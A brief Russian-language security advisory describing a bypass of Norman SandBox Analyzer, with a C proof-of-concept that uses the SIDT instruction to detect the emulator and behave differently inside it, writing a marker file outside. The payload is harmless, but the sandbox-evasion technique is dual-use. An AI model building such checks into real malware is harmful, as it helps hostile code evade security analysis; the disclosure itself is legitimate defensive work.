Программа: Norman SandBox Analyzer

Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. Уязвимость существует из-за ошибки в обработке злонамеренного ПО при помещении его в эмулируемую среду. Атакующий может передать в анализатор специально составленные программы, которые будут скрывать свои вредоносные функции при помещении их в эмулируемую среду и сканировании анализатором.

Пример:

Обход SandBox Analyzer и создание файла c:\breakstuff.txt на реальной Windows системе.

unsigned char idt[6];

__asm
{
    sidt idt
}
if ((0x00 == idt[0]) && (0x08 == idt[1]))
{
    fp = fopen("c:\\donothing.txt", "w");
    fclose(fp);
}
else
{
    fp = fopen("c:\\breakstuff.txt", "w");
    fclose(fp);
}



Оставить мнение